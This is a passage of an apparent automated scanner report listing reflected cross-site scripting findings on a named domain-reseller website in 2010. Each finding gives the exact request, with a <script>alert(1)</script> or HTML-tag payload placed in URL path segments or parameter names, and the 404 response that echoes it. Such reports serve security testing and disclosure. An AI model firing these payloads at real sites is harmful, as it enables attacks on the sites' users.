Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&7c5d5<script>alert(1)</script>ee24d96d979=1 was not found on this server.</p>
...[SNIP]...

2.5040. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ca195<a>23e73410ff9 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ca195<a>23e73410ff9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ca195<a>23e73410ff9 was not found on this server.</p>
...[SNIP]...

2.5041. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 28054<script>alert(1)</script>7fbeb67cd08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service28054<script>alert(1)</script>7fbeb67cd08/domain-names/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service28054<script>alert(1)</script>7fbeb67cd08/domain-names/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5042. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 957fd<script>alert(1)</script>9441761927e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names957fd<script>alert(1)</script>9441761927e/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names957fd<script>alert(1)</script>9441761927e/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5043. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 16eba<script>alert(1)</script>163d6df3bd0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes16eba<script>alert(1)</script>163d6df3bd0/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes16eba<script>alert(1)</script>163d6df3bd0/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5044. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8caf1<script>alert(1)</script>000e8a48fc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos8caf1<script>alert(1)</script>000e8a48fc/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos8caf1<script>alert(1)</script>000e8a48fc/images/review/ was not found on this server.</p>
...[SNIP]...

2.5045. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ab6c4<script>alert(1)</script>4e6e33691dd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/imagesab6c4<script>alert(1)</script>4e6e33691dd/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/imagesab6c4<script>alert(1)</script>4e6e33691dd/review/ was not found on this server.</p>
...[SNIP]...

2.5046. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3071d<script>alert(1)</script>8cd67161692 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/review3071d<script>alert(1)</script>8cd67161692/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review3071d<script>alert(1)</script>8cd67161692/ was not found on this server.</p>
...[SNIP]...

2.5047. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cc1d9<script>alert(1)</script>11dc99014af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/review/?cc1d9<script>alert(1)</script>11dc99014af=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review/?cc1d9<script>alert(1)</script>11dc99014af=1 was not found on this server.</p>
...[SNIP]...

2.5048. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6dc96<script>alert(1)</script>bb3ac220d82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service6dc96<script>alert(1)</script>bb3ac220d82/domain-names/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service6dc96<script>alert(1)</script>bb3ac220d82/domain-names/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5049. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 29f26<script>alert(1)</script>89089efce28 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names29f26<script>alert(1)</script>89089efce28/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names29f26<script>alert(1)</script>89089efce28/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5050. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload be3fc<script>alert(1)</script>5cf47b6e92c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themesbe3fc<script>alert(1)</script>5cf47b6e92c/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themesbe3fc<script>alert(1)</script>5cf47b6e92c/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5051. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 588c0<script>alert(1)</script>a37559de023 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos588c0<script>alert(1)</script>a37559de023/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos588c0<script>alert(1)</script>a37559de023/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5052. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9b596<script>alert(1)</script>d0695dfda43 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images9b596<script>alert(1)</script>d0695dfda43/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images9b596<script>alert(1)</script>d0695dfda43/review/0.gif was not found on this server.</p>
...[SNIP]...

2.5053. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 54a95<script>alert(1)</script>0b7f692be97 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/review54a95<script>alert(1)</script>0b7f692be97/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review54a95<script>alert(1)</script>0b7f692be97/0.gif was not found on this server.</p>
...[SNIP]...

2.5054. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload b6b8f<script>alert(1)</script>4e9b6871e96 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/review/0.gifb6b8f<script>alert(1)</script>4e9b6871e96 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review/0.gifb6b8f<script>alert(1)</script>4e9b6871e96 was not found on this server.</p>
...[SNIP]...

2.5055. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 356fe<script>alert(1)</script>57730ced639 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/review/0.gif?356fe<script>alert(1)</script>57730ced639=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/review/0.gif?356fe<script>alert(1)</script>57730ced639=1 was not found on this server.</p>
...[SNIP]...

2.5056. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/5.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 589e2<script>alert(1)</script>64e41384537 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service589e2<script>alert(1)</script>64e41384537/domain-names/themes/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service589e2<script>alert(1)</script>64e41384537/domain-names/themes/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5057. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/5.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 12b90<script>alert(1)</script>361e64fc958 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names12b90<script>alert(1)</script>361e64fc958/themes/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names12b90<script>alert(1)</script>361e64fc958/themes/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5058. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/5.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1a52c<script>alert(1)</script>d23e5c1a1fe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes1a52c<script>alert(1)</script>d23e5c1a1fe/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
